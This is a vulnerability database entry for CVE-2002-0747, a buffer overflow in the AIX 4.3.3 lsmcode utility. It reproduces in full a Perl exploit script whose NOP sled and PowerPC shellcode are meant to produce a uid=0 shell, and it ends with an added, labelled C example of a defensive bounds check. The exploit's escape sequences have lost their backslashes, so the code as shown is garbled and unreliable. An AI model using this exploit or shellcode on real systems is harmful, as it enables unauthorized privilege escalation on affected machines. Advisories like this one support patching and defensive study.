AIX lsmcode Buffer Overflow Vulnerability

Vulnerability ID: 1107363
Vulnerability type: Buffer overflow
Published: 2003-06-01
Updated: 2003-06-01
CVE ID: CVE-2002-0747
CNNVD ID: CNNVD-200208-178
Platform: AIX
CVSS score: 10.0
|Vulnerability Source
https://www.exploit-db.com/exploits/22756
https://www.securityfocus.com/bid/82897
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200208-178
|Vulnerability Details
The lsmcode utility in AIX 4.3.3 contains a buffer overflow vulnerability.
|Exploit
source: http://www.securityfocus.com/bid/7871/info

Insufficient bounds checking in the lsmcode utility will allow locally based attackers to cause memory to be corrupted with attacker-supplied data. As a result, it is possible to exploit this condition to execute arbitrary attacker-supplied instructions with elevated privileges. 

#!/usr/bin/perl
# FileName: x_lsmcode_aix4x.pl
# Exploit lsmcode of Aix4.3.3 to get a uid=0 shell.
# Tested  : on Aix4.3.3. Maybe can work on other versions.
# Author  : [email protected]
# Site    : www.xfocus.org   www.xfocus.net
# Date    : 2003-6-1
# Announce: use at your own risk!

$CMD="/usr/sbin/lsmcode";
$_=`/usr/bin/oslevel`;

$XID="x03";
$UID="x97";
print "nnExploit $CMD for Aix 4.3.3 to get uid=0 shell.n";
print "From: [ www.xfocus.org 2003-6-1 ].nn";

$NOP="x7cxa5x2ax79"x800;
%ENV=();

$ENV{CCC}="A" .$NOP.&getshell($XID,$UID);
$ENV{DIAGNOSTICS}="x2fxf2x2ax2f"x300;
$ret = system $CMD ,"-d","a";

for($i=0;$i<4 && $ret;$i++){
  for($j=0;$j<4 && $ret;$j++) {
    $ENV{CCC}="A"x $i .$NOP.&getshell($XID,$UID);
    $ENV{DIAGNOSTICS}="A"x $j ."x2fxf2x2ax2f"x300;
    $ret = system $CMD ,"-d","a";
  }
}

#sub
sub getshell($XID,$GID) {
  my $SHELL,($XID,$GID)=@_;
  $SHELL="x7ex94xa2x79x7ex84xa3x78x40x82xffxfd";
  $SHELL.="x7exa8x02xa6x3axb5x01x40x88x55xfexe0";
  $SHELL.="x7ex83xa3x78x3axd5xfexe4x7exc8x03xa6";
  $SHELL.="x4cxc6x33x42x44xffxffx02$GID$XIDxffxff";
  $SHELL.="x38x75xffx04x38x95xffx0cx7ex85xa3x78";
  $SHELL.="x90x75xffx0cx92x95xffx10x88x55xfexe1";
  $SHELL.="x9ax95xffx0bx4bxffxffxd8/bin/shxff";
  return $SHELL;
}
#EOF
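
Added example, not code from lsmcode or from the original advisory: the kind of bounds check whose absence the description above refers to, applied to an environment value before a privileged tool copies it into a fixed buffer. It assumes the unchecked input is the DIAGNOSTICS variable that the script above makes oversized; DIAG_PATH_MAX, check_and_copy and copy_env_path are hypothetical names.

```c
#include <ctype.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Hypothetical capacity: the real buffer size inside lsmcode is not on the page. */
#define DIAG_PATH_MAX 256

enum env_status { ENV_OK = 0, ENV_UNSET = -1, ENV_TOO_LONG = -2, ENV_BAD_BYTES = -3 };

/* Unsafe pattern, for contrast only (not compiled): the copy length is set by the caller.
 *     char buf[DIAG_PATH_MAX]; strcpy(buf, getenv("DIAGNOSTICS")); */

/* Copy val into dst (capacity dstlen) only if it fits with its NUL terminator and is an
 * absolute path of printable bytes. Oversized input is rejected, never truncated. */
int check_and_copy(const char *val, char *dst, size_t dstlen)
{
    size_t len, i;
    if (dst == NULL || dstlen == 0)
        return ENV_TOO_LONG;
    dst[0] = '\0';                       /* dst is always a valid string */
    if (val == NULL)
        return ENV_UNSET;
    len = strlen(val);
    if (len >= dstlen)
        return ENV_TOO_LONG;
    if (val[0] != '/')
        return ENV_BAD_BYTES;
    for (i = 0; i < len; i++)
        if (!isprint((unsigned char)val[i]))
            return ENV_BAD_BYTES;
    memcpy(dst, val, len + 1);           /* len + 1 <= dstlen, checked above */
    return ENV_OK;
}

/* Wrapper a setuid utility would call instead of using getenv() output directly. */
int copy_env_path(const char *name, char *dst, size_t dstlen)
{
    return check_and_copy(getenv(name), dst, dstlen);
}

int main(void)
{
    char dst[DIAG_PATH_MAX];
    int rc = copy_env_path("DIAGNOSTICS", dst, sizeof dst);
    printf("DIAGNOSTICS status=%d value=\"%s\"\n", rc, dst);
    return rc == ENV_OK || rc == ENV_UNSET ? 0 : 1;
}
```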
|Affected Products
IBM AIX 4.3.3
|References

Source: AIXAPAR
Name: IY29589
Link: http://archives.neohapsis.com/archives/aix/2002-q2/0005.html
